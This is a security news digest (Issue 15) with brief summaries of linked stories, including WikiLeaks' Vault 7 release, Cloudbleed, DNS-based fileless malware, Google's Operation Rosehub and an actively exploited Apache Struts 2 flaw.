Issue 15

WikiLeaks publishes Vault 7, collection of alleged CIA hacking tools

WikiLeaks has published a large set of hacking tools belonging to the CIA. Right now the dump only contains documentation, no actual malware or exploits. Their original announcement can be found here.

bleepingcomputer.com

 

Cloudbleed triggered 1.2M times, damage kept to minimum

A look at the impact of the 'CloudBleed' vulnerability.

threatpost.com

 

HackerOne offers open source projects free access to platform

HackerOne, the bug bounty platform, now offers its service free to open-source projects. To be eligible the project must be older than three months, active, and covered by an Open Source Initiative (OSI) license .

threatpost.com

 

New fileless malware uses DNS queries to receive PowerShell commands

Interesting new malware was discovered that uses DNS as a command & control system. It will establish itself through a number of steps and fetch Powershell scripts written in DNS TXT records, while never actually writing a file to disk, making it hard to detect.

thehackernews.com

 

Google Open Source Blog: Operation Rosehub

Great story of how 50 Google employees banded together to patch all open-source projects on Github that were still vulnerable to the "Mad Gadget vulnerability", a remote code execution bug that recently hit the San Francisco Metro system. Over 2600 projects received a pull request to fix the issue.

googleblog.com

 

Thou shalt not depend on me: analysing the use of outdated JavaScript libraries on the web

It's not surprising that a huge number of sites uses one or more Javascript libraries with known vulnerabilities. This articles gives an overview of how bad it actually is.

acolyer.org

 

DHS funding new round of IoT cyber startups with total of $1M award

The Department of Homeland Security has awarded $200,000 to five startups with promising IoT security technology. They will be guided through further steps to build out their PoC's to a full product.

cyberscoop.com

 

Pentagon launches open-source experiment

The US Defence Department has launched code.mil, a website that will be used to host unclassified code written by the department, and which will be free to use for personal or public projects.

nextgov.com

 

Apple pushing two-factor authentication for iOS 10.3 users

Apple seems to be nudging users more explicitly to adopt 2fa in the latest iOS version, which is currently in beta.

sophos.com

 

Apache servers under attack through easily exploitable Struts 2 flaw

Struts 2, a Java web application framework, has a critical remote code execution vulnerability that is being exploited in the wild. Patching is advised.

helpnetsecurity.com

 

In Appreciation: Howard A. Schmidt

Howard Schmidt, who was the top cybersecurity advisor for both Bush and Obama, has passed away. Reading about what he did and what kind of person he was, he will clearly be missed.

darkreading.com